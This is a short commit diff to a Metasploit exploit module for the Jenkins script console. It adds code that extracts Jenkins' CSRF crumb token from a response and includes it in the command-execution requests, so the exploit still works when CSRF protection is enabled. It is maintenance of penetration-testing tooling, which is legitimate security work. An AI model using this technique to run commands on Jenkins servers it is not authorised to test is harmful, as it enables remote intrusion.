Fix jenkins when CSRF is enabled

fmunozs · fmunozs · commit 4c2ae1a7539a · 2014-10-14T19:33:23.000-05:00
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -80,6 +80,7 @@ def http_send_command(cmd, opts = {})
         }
     }
     request_parameters['cookie'] = @cookie if @cookie != nil
+    request_parameters['vars_post']['.crumb'] = @crumb if @crumb != nil
     res = send_request_cgi(request_parameters)
     if not (res and res.code == 200)
       fail_with(Failure::Unknown, 'Failed to execute the command.')
@@ -145,6 +146,7 @@ def exploit
     fail_with(Failure::Unknown) if not res
 
     @cookie = nil
+    @crumb = nil
     if res.code != 200
       print_status('Logging in...')
       res = send_request_cgi({
@@ -167,6 +169,11 @@ def exploit
       print_status('No authentication required, skipping login...')
     end
 
+    if (res.body =~ /"\.crumb", "([a-z0-9]*)"/) 
+        print_status("Using CSRF token: '#{$1}'");
+        @crumb = $1;
+    end
+
     case target['Platform']
     when 'win'
       print_status("#{rhost}:#{rport} - Sending command stager...")
